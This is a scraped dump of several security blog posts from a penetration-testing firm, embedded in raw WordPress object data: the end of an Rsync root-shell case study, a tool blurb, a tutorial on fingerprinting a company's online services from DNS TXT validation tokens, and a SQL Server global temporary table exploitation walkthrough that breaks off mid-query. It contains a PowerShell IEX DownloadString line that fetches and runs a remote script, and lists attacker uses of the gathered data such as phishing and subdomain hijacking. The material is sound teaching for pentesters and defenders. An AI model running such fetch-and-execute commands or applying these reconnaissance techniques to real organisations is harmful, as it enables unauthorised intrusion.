Below is a video created in a lab environment that shows the process of identifying and exploiting an insecurely configured Rsync server to gain a root shell. While it see too simple to be true, it is based on configurations exploited during real penetration tests.

Wrap Up

This blog illustrated one way to obtain a root shell on a remote Linux system using a vulnerability that provided write access.  While there are many ways to obtain the same end, I think the moral of the story is to make sure that all network share types are configured with least privilege to help prevent unauthorized access to data and systems.   Hopefully this blog will be useful to new pentesters and defenders trying to better understand the potential impacts associated with insecurely configured Rsync servers.  Good luck and hack responsibly!

The next blog in the series focuses on NFS and setuid binaries, it can be found here.

References

[post_title] => Linux Hacking Case Studies Part 1: Rsync [post_excerpt] => This blog will walk through how to attack insecure Rsync configurations in order to gain a root shell on a Linux system. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => linux-hacking-case-studies-part-1-rsync [to_ping] => [pinged] => [post_modified] => 2022-04-04 10:01:30 [post_modified_gmt] => 2022-04-04 15:01:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11299 [menu_order] => 519 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [28] => WP_Post Object ( [ID] => 17444 [post_author] => 53 [post_date] => 2020-02-23 15:37:45 [post_date_gmt] => 2020-02-23 15:37:45 [post_content] =>

Learn about one of the open source projects from the NetSPI toolbox called PowerUpSQL. PowerUpSQL can be used to blindly inventory SQL Servers, audit them for common security misconfigurations, and exploit identified vulnerabilities during pentests and red teams operations. PowerUpSQL is an open source tool available on GitHub, learn more at https://powerupsql.com/.

For more open source projects from NetSPI check out https://github.com/netspi.

https://youtu.be/7sT1OQEtXlg
[post_title] => Attacking Modern Environments through SQL Server with PowerUpSQL [post_excerpt] => Learn about one of the open source projects from the NetSPI toolbox called PowerUpSQL. PowerUpSQL can be used to blindly inventory SQL Servers, audit them for common security misconfigurations, and exploit identified vulnerabilities during pentests and red teams operations. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-modern-environments-through-sql-server-with-powerupsql [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:18:39 [post_modified_gmt] => 2023-09-01 12:18:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17444 [menu_order] => 80 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [29] => WP_Post Object ( [ID] => 11219 [post_author] => 17 [post_date] => 2019-11-18 07:00:30 [post_date_gmt] => 2019-11-18 07:00:30 [post_content] => DNS reconnaissance is an important part of most external network penetration tests and red team operations. Within DNS reconnaissance there are many areas of focus, but I thought it would be fun to dig into DNS TXT records that were created to verify domain ownership. They’re pretty common and can reveal useful information about the technologies and services being used by the target company. In this blog I’ll walkthrough how domain validation typically works, review the results of my mini DNS research project, and share a PowerShell script that can be used to fingerprint online service providers via DNS TXT records. This should be useful to red teams and internal security teams looking for ways to reduce their internet facing footprint. Below is an overview of the content if you want to skip ahead:

Domain Ownership Validation Process

When companies or individuals want to use an online service that is tied to one of their domains, the ownership of that domain needs to be verified.  Depending on the service provider, the process is commonly referred to as “domain validation” or “domain verification”. Below is an outline of how that process typically works:
  1. The company creates an account with the online service provider.
  2. The company provides the online service provider with the domain name that needs to be verified.
  3. The online service provider sends an email containing a unique domain validation token (text value) to the company’s registered contact for the domain.
  4. The company then creates a DNS TXT record for their domain containing the domain validation token they received via email from the online service provider.
  5. The online service provider validates domain ownership by performing a DNS query to verify that the TXT record containing the domain validation token has been created.
  6. In most cases, once the domain validation process is complete, the company can remove the DNS TXT record containing the domain validation token.
It’s really that last step that everyone seems to forget to do, and that’s why simple DNS queries can be so useful for gaining insight into what online service providers companies are using. Note: The domain validation process doesn’t always require a DNS TXT entry.  Some online service providers simply request that you upload of a text file containing the domain validation token to the webroot of the domain’s website.  For example, https://mywebsite.com/validation_12345.txt.  Google dorking can be a handy way to find those instances if you know what you’re looking for, but for now let’s stay focused on DNS records.

Analyzing TXT Records for a Million Domains

Our team has been gleaning information about online service providers from DNS TXT records for years,  but I wanted a broader understanding of what was out there.  So began my journey to identify some domain validation token trends.

Choosing a Domain Sample

I started by simply grabbing DNS TXT records for the Alexa top 1 million sites.  I used a slightly older list, but for those looking to mine that information on a reoccurring basis, Amazon has a service you can use at https://aws.amazon.com/alexa-top-sites/.

Tools for Querying TXT Records

DNS TXT records can be easily viewed with tools like nslookup, host, dig, massdns, or security focused tools like dnsrecon .  I ended up using a basic PowerShell script to make all of the DNS requests, because PowerShell lets me be lazy. 😊  It was a bit slow, but it still took less than a day to collect all of the TXT records from 1 million sites. Below is the basic collection script I used.
# Import list of domains
$Domains = gc c:tempdomains.txt

# Get TXT records for domains
$txtlist = $Domains |
ForEach-Object{
    Resolve-DnsName -Type TXT $_ -Verbose
}

# Filter out most spf records
$Results = $txtlist  | where type -like txt |  select name,type,strings | 
ForEach-Object {
    $myname = $_.name
    $_.strings | 
    foreach {
        
        $object = New-Object psobject
        $object | add-member noteproperty name $myname
        $object | add-member noteproperty txtstring $_
        if($_ -notlike "v=spf*")
        {
            $object
        }
    }
} | Sort-Object name

# Save results to CSV
$Results | Export-Csv -NoTypeInformation dnstxt-records.csv

# Return results to console
$Results

Quick and Dirty Analysis of Records

Below is the high level process I used after the information was collected:
  1. Removed remaining SPF records
  2. Parsed key value pairs
  3. Sorted and grouped similar keys
  4. Identified the service providers through Google dorking and documentation review
  5. Removed keys that were completely unique and couldn’t be easily attributed to a specific service provider
  6. Categorized the service providers
  7. Identified most commonly used service provider categories based on domain validation token counts
  8. Identified most commonly used service providers based on domain validation token counts

Top 5 Service Provider Categories

After briefly analyzing the DNS TXT records for approximately 1 million domains, I’ve created a list of the most common online service categories and providers that require domain validation. Below are the top 5 categories:
 PLACE CATEGORY
1 Cloud Service Providers with full suites of online services like Google, Microsoft, Facebook, and Amazon seemed to dominate the top of the list.
2 Certificate Authorities like globalsign were a close second.
3 Electronic Document Signing like Adobe sign and Docusign hang around third place.
4 Collaboration Solutions like Webex, Citrix, and Atlassian services seem to sit around fourth place collectively.
5 Email Marketing and Website Analytics providers like Pardot and Salesforce seemed to dominate the ranks as well, no surprise there.
There are many other types of services that range from caching services like Cloudflare to security services like “Have I Been Pwned”, but the categories above seem to be the most ubiquitous. It’s also worth noting that I removed SPF records, because technically there are not domain validation tokens.  However, SPF records are another rich source of information that could potentially lead to email spoofing opportunities if they aren’t managed well.  Either way, they were out of scope for this blog.

Top 25 Service Providers

Below are the top 25 service providers I was able to fingerprint based on their domain validation token (TXT record).  However, in total I was able to provide attribution for around 130.
 COUNT PROVIDER CATEGORY EXAMPLE TOKEN
149785 gmail.com Cloud Services google-site-verification=ZZYRwyiI6QKg0jVwmdIha68vuiZlNtfAJ90msPo1i7E
70797 microsoft office 365 Cloud Services ms=hash
16028 facebook.com Cloud Services facebook-domain-verification=zyzferd0kpm04en8wn4jnu4ooen5ct
11486 globalsign.com Certificate Authority _globalsign-domain-verification=Zv6aPQO0CFgBxwOk23uUOkmdLjhc9qmcz-UnQcgXkA
5097 Adobe Enterprise Services Electronic Signing,Cloud Services adobe-idp-site-verification=ffe3ccbe-f64a-44c5-80d7-b010605a3bc4
4093 Amazon Simple Email Cloud Services amazonses:ZW5WU+BVqrNaP9NU2+qhUvKLdAYOkxWRuTJDksWHJi4=
3605 globalsign.com Certificate Authority globalsign-domain-verification=zPlXAjrsmovNlSOCXQ7Wn0HgmO--GxX7laTgCizBTW
3486 atlassian services Collaboration atlassian-domain-verification=Z8oUd5brL6/RGUMCkxs4U0P/RyhpiNJEIVx9HXJLr3uqEQ1eDmTnj1eq1ObCgY1i
2700 mailru- Cloud Services mailru-verification: fa868a61bb236ae5
2698 yandex.com Cloud Services yandex-verification=fb9a7e8303137b4c
2429 Pardot (Salesforce) Marketing and Analytics pardot_104652_*=b9b92faaea08bdf6d7d89da132ba50aaff6a4b055647ce7fdccaf95833d12c17
2098 docusign.com Electronic Signing docusign=ff4d259b-5b2b-4dc7-84e5-34dc2c13e83e
1468 webex Collaboration webexdomainverification.P7KF=bf9d7a4f-41e4-4fa3-9ccb-d26f307e6be4
1358 www.sendinblue.com Marketing and Analytics Sendinblue-code:faab5d512036749b0f69d906db2a7824
1005 zoho.com Email zoho-verification=zb[sequentialnumber].zmverify.zoho.[com|in]
690 dropbox.com Collaboration dropbox-domain-verification=zsp1beovavgv
675 webex.com Collaboration ciscocidomainverification=f1d51662d07e32cdf508fe2103f9060ac5ba2f9efeaa79274003d12d0a9a745
607 Spiceworks.com Security workplace-domain-verification=BEJd6oynFk3ED6u0W4uAGMguAVnPKY
590 haveibeenpwned.com Security have-i-been-pwned-verification=faf85761f15dc53feff4e2f71ca32510
577 citrix.com Collaboration citrix-verification-code=ed1a7948-6f0d-4830-9014-d22f188c3bab
441 brave.com Collaboration brave-ledger-verification=fb42f0147b2264aa781f664eef7d51a1be9196011a205a2ce100dc76ab9de39f
427 Adobe Sign / Document Cloud Electronic Signing adobe-sign-verification=fe9cdca76cd809222e1acae2866ae896
384 Firebase (Google) Development and Publishing firebase=solar-virtue-511
384 O365 Cloud Services mscid=veniWolTd6miqdmIAwHTER4ZDHPBmT0mDwordEu6ABR7Dy2SH8TjniQ7e2O+Bv5+svcY7vJ+ZdSYG9aCOu8GYQ==
381 loader.io Security loaderio=fefa7eab8eb4a9235df87456251d8a48

Automating Domain Validation Token Fingerprinting

To streamline the process a little bit I've written a PowerShell function called "Resolve-DnsDomainValidationToken".  You can simply provide it domains and it will scan the associated DNS TXT records for known service providers based on the library of domain validation tokens I created.  Currently it supports parameters for a single domain, a list of domains, or a list of URLs. Resolve-DnsDomainValidationToken can be downloaded HERE.

Command Example

To give you an idea of what the commands and output look like I've provided an example below.  The target domain was randomly selected from the Alexa 1 Million list.
# Load Resolve-DnsDomainValidationToken into the PowerShell session
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Resolve-DnsDomainValidationToken.ps1")

# Run Resolve-DnsDomainValidationToken to collect and fingerprint TXT records
$Results = Resolve-DnsDomainValidationToken -Verbose -Domain adroll.com  

# View records in the console
$Results
Domain Validation Token Fingerprint For those of you that don't like starring at the console, the results can also be viewed using Out-GridView.
# View record in the out-grid view
$Results | Out-GridView
Domain Validation Token Fingerprint Gridview Finally, the command also automatically creates two csv files that contain the results:
  1. Dns_Txt_Records.csv contains all TXT records found.
  2. Dns_Txt_Records_Domain_Validation_Tokens.csv contains those TXT records that could fingerprinted.
Domain Validation Token Fingerprint Csv

How can Domain Validation Tokens be used for Evil?

Below are a few examples of how we've used domain validation tokens during penetration tests.  I’ve also added a few options only available to real-world attackers due to legal constraints placed on penetration testers and red teams.

Penetration Testers Use Cases

  1. Services that Support Federated Authentication without MFA This is our most common use case. By reviewing domain validation tokens we have been able to identify service providers that support federated authentication associated with the company’s Active Directory deployment.  In many cases they aren’t configured with multi-factor authentication (MFA).  Common examples include Office 365, AWS, G Suite, and Github. Pro Tip: Once you’ve authenticated to Azure, you can quickly find additional service provider targets that support federated/managed authentication by parsing through the service principal names.  You can do that with Karl’s Get-AzureDomainInfo.ps1 script.
  2. Subdomain Hijacking Targets The domain validation tokens could reveal services that support subdomain which can be attacked once the CNAME records go stale. For information on common techniques Patrik Hudak wrote a nice overview here.
  3. Social Engineering Fuel Better understanding the technologies and service providers used by an organization can be useful when constructing phone and email phishing campaigns.
  4. General Measurement of Maturity When reviewing domain validation tokens for all of the domains owned by an organization it’s possible to get a general understanding of their level of maturity, and you can start to answer some basic questions like:
    1. Do they use Content Distribution Networks (CDNs) to distribute and protect their website content?
    2. Do they user 3rd party marketing and analytics? If so who? How are they configured?
    3. Do they use security related service providers? What coverage do those provide?
    4. Who are they using to issue their SSL/TLS certifications? How are they used?
    5. What mail protection services are they using? What are those default configurations?
  5. Analyzing domain validation tokens for a specific online service provider can yield additional insights. For example,
    1. Many domain validation tokens are unique numeric values that are simply incremented for each new customer.  By analyzing the values over thousands of domains you can start to infer things like how long a specific client has been using the service provider.
    2. Some of the validation tokens also include hashes and encrypted base64 values that could potentially be cracked offline to reveal information.
  6. Real-world attackers can also attempt to compromise service providers directly and then move laterally into a specific company’s site/data store/etc. Shared hosting providers are a common example. Penetration testers and red teams don’t get to take advantage of those types of scenarios, but if you’re a service provider you should be diligent about enforcing client isolation to help avoid opening those vectors up to attackers.

Wrap Up

Analyzing domain validation tokens found in DNS TXT records is far from a new concept, but I hope the library of fingerprints baked into Resolve-DnsDomainValidationToken will help save some time during your next red team, pentest,  or internal audit.  Good luck and hack responsibly! [post_title] => Analyzing DNS TXT Records to Fingerprint Online Service Providers [post_excerpt] => In this blog I'll share a process/script that can be used to identify online service providers used by a target company through domain validation tokens stored in DNS TXT records. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => analyzing-dns-txt-records-to-fingerprint-service-providers [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:58:16 [post_modified_gmt] => 2021-06-08 21:58:16 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11219 [menu_order] => 540 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [30] => WP_Post Object ( [ID] => 11191 [post_author] => 17 [post_date] => 2019-11-11 07:00:58 [post_date_gmt] => 2019-11-11 07:00:58 [post_content] => SQL Server global temporary tables usually aren’t an area of focus during network and application penetration tests.  However, they are periodically used insecurely by developers to store sensitive data and code blocks that can be accessed by unprivileged users.  In this blog, I'll walk through how global temporary tables work, and share some techniques that we’ve used to identify and exploit them in real applications. If you don't want to read through everything you can jump ahead:

Lab Setup

  1. Install SQL Server. Most of the scenarios we’ll cover can be executed with SQL Server Express, but if you want to follow along with the case study you will need to use one of the commercial versions that supports agent jobs.
  2. Log into the SQL Server as a sysadmin.
  3. Create a least privilege login.
-- Create server login
CREATE LOGIN [basicuser] WITH PASSWORD = 'Password123!';
Img Create Login

What are Global Temporary Tables?

The are many ways to store data temporarily in SQL Server, but temporary tables seem to be one of the most popular methods. Based on what I’ve seen, there are three types of temporary tables commonly used by developers that include table variables, local temporary tables, and global temporary tables. Each has its pros, cons, and specialized use cases, but global temporary tables tend to create the most risk, because they can be read and modified by any SQL Server user.  As a result, using global temporary tables often results in race conditions that can be exploited by least privilege users to gain unauthorized access to data and privileges.

How do Temporary Tables Work?

In this section I’ve provided a primer that covers how to create the three types of temporary tables, where they’re stored, and who can access them. To get us started let’s sign into SQL Server using our sysadmin login and review each of the three types of temp tables. All of the temporary tables are stored in the tempdb database and can be listed using the query below.
SELECT *
FROM tempdb.sys.objects
WHERE name like '#%';
All users in SQL Server can execute the query above, but the access users have to the tables displayed depends largely on  the table type and scope. Below is a summary of the scope for each type of temporary table. Img Types Of Temp Tables With that foundation in place, let’s walk through some TSQL exercises to help better understand each of those scope boundaries.

Exercise 1: Table Variables

Table variables are limited to a single query batch within the current user’s active session.  They’re not accessible to other query batches, or to other active user sessions. As a result, it’s not very likely that data would be leaked to unprivileged users. Below is an example of referencing a table variable in the same batch.
-- Create table variable
If not Exists (SELECT name FROM tempdb.sys.objects WHERE name = 'table_variable')
DECLARE @table_variable TABLE (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records into table variable
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO @table_variable (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')

-- Query table variable in same batch 
SELECT * 
FROM @table_variable
GO
Img Table Variable Same Batch We can see from the image above that we are able to query the table variable within the same batch query.  However, when we separate the table creation and table data selection into two batches using “GO”, we can see that the table variable is no longer accessible outside of its original batch job.  Below is an example. Img Table Variable Diff Batch Hopefully that helps illustrate the scope limitations of table variables, but you might still be wondering how they’re stored.  When you create a table variable it’s stored in tempdb using a name starting with a “#” and randomly generated characters.  The query below can be used to filter for table variables being used.
SELECT * 
FROM tempdb.sys.objects  
WHERE name not like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1

Exercise 2: Local Temporary Tables

Like table variables, local temporary tables are limited to the current user’s active session, but they are not limited to a single batch. For that reason, they offer more flexibility than table variables, but still don’t increase the risk of unintended data exposure, because other active user sessions can’t access them.  Below is a basic example showing how to create and access local temporary tables across different query batches within the same session.
-- Create local temporary table
IF (OBJECT_ID('tempdb..#LocalTempTbl') IS NULL)
CREATE TABLE #LocalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records local temporary table
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO #LocalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query local temporary table
SELECT * 
FROM #LocalTempTbl
GO
Img Local Temp Table As you can see from the image above, the table data can still be accessed across multiple query batches.  Similar to table variables, all custom local temporary tables need to start with a “#”.  Other than you can name them whatever you want.  They are also stored in the tempdb database, but SQL Server will append some additional information to the end of your table name so access can be constrained to your session.  Let’s see what our new table “#LocalTempTbl” looks like in tempdb with the query below.
SELECT * 
FROM tempdb.sys.objects 
WHERE name like '%[_]%' 
AND (select len(name) - len(replace(name,'#',''))) = 1
</code
Img Local Temp Table Above we can see the table we created named “#LocalTempTbl”, had some of the additional session information appended to it.  All users can see the that temp table name, but only the session that created it can access its contents.  It appears that the session id appended to the end increments with each session made to the server, and you can actually use the full name to query that table from with your session.  Below is an example.
SELECT * 
FROM tempdb..[ #LocalTempTbl_______________________________________________________________________________________________________000000000007]
</code
Img Local Temp Table However, if you attempt to access that temp table from another user’s session you get the follow error. Img Local Temp Table Regardless, when you’re all done with the local temporary table it can be removed by terminating your session or explicitly dropping it using the example command below.
DROP TABLE #LocalTempTbl

Exercise 3: Global Temporary Tables

Ready to level up? Similar to local temporary tables you can create and access global temporary tables from separate batched queries. The big difference is that ALL active user sessions can view and modify global temporary tables.  Let’s take a look at a basic example below.
-- Create global temporary table
IF (OBJECT_ID('tempdb..##GlobalTempTbl') IS NULL)
CREATE TABLE ##GlobalTempTbl (Spy_id INT NOT NULL, SpyName text NOT NULL, RealName text NULL);

-- Insert records global temporary table
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (1,'Black Widow','Scarlett Johansson')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (2,'Ethan Hunt','Tom Cruise')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (3,'Evelyn Salt','Angelina Jolie')
INSERT INTO ##GlobalTempTbl (Spy_id, SpyName, RealName) VALUES (4,'James Bond','Sean Connery')
GO

-- Query global temporary table
SELECT * 
FROM ##GlobalTempTbl
GO
Img Global Temp Table Above we can see that we are able to query the global temporary table across different query batches. All custom global temporary tables need to start with “##”.  Other than you can name them whatever you want.  They are also stored in the tempdb database.  Let’s see what our new table “##GlobalTempTbl” looks like in tempdb with the query below.
SELECT * 
FROM tempdb.sys.objects 
WHERE (select len(name) - len(replace(name,'#',''))) > 1
</code
Img Global Temp Table You can see that SQL Server doesn’t append any session related data to the table name like it does with local temporary tables, because it’s intended to be used by all sessions. Let’s sign into another session using the “basicuser” login we created to show that’s possible. Img Global Temp Table As you can see, if that global temporary table contains sensitive data it’s now exposed to all of the SQL Server users.

How do I Find Vulnerable Global Temporary Tables?

It’s easy to target Global Temp Tables when you know the table name, but most auditors and attackers won’t know where the bodies are buried.  So, in this section I’ll cover a few ways you can blindly locate potentially exploitable global temporary tables.
  • Review Source Code if you’re a privileged user.
  • Monitor Global Temporary Tables if you’re an unprivileged user.

Review Source Code

If you’re logged into SQL Server as a sysadmin or a user with other privileged roles, you can directly query the TSQL source code of agent jobs, store procedures, functions, and triggers for each database. You should be able to filter the query results for the string “##” to identify the use of global temporary table usage in the TSQL. With the filtered list in hand, you should be able to review the relevant TSQL source code and determine under which conditions the global temporary tables are vulnerable to attack. Below are some links to TSQL query templates to get you started: It’s worth noting that PowerUpSQL also supports functions that can be used to query for that information. Those functions include:
  • Get-SQLAgentJob Get-SQLStoredProcedure
  • Get-SQLTriggerDdl
  • Get-SQLTriggerDml
It would be nice if we could always just view the source code, but the reality is that most attackers won’t have sysadmin privileges out of the gate.  So, when you find you self in that position it’s time to change your approach.

Monitor Global Temporary Tables

Now let’s talk about blindly identifying global temporary tables from a least privilege perspective.  In the previous sections, we showed how to list temporary table names and query their contents. However, we didn’t have easy insight into the columns.  So below I’ve extended the original query to include that information.
-- List global temp tables, columns, and column types
SELECT t1.name as 'Table_Name',
       t2.name as 'Column_Name',
       t3.name as 'Column_Type',
       t1.create_date,
       t1.modify_date,
       t1.parent_object_id       
FROM tempdb.sys.objects AS t1
JOIN tempdb.sys.columns AS t2 ON t1.OBJECT_ID = t2.OBJECT_ID
JOIN sys.types AS t3 ON t2.system_type_id = t3.system_type_id
WHERE (select len(t1.name) - len(replace(t1.name,'#',''))) > 1
If you didn’t DROP “##GlobalTempTbl”, then you should see something similar to the results below when you execute the query. Img Global Temp Table Running the query above provides insight into the global temporary tables being used at that moment, but it doesn’t help us monitor for their use over time.  Remember, temporary tables are commonly only used for a short period of time, so you don’t want to miss them. The query below is a variation of the first query, but will provide a list of global temporary tables every second.  The delay can be changed by modifying the “WAITFOR” statement, but be careful not to overwhelm the server.  If you’re not sure what you’re doing, then this technique should only be practiced in non-production environments.
-- Loop
While 1=1
BEGIN
    SELECT t1.name as 'Table_Name',
           t2.name as 'Column_Name',
           t3.name as 'Column_Type',
           t1.create_date,
           t1.modify_date,
           t1.parent_object_id       
    FROM tempdb.sys.objects AS t1
    JOIN tempdb.sys.columns A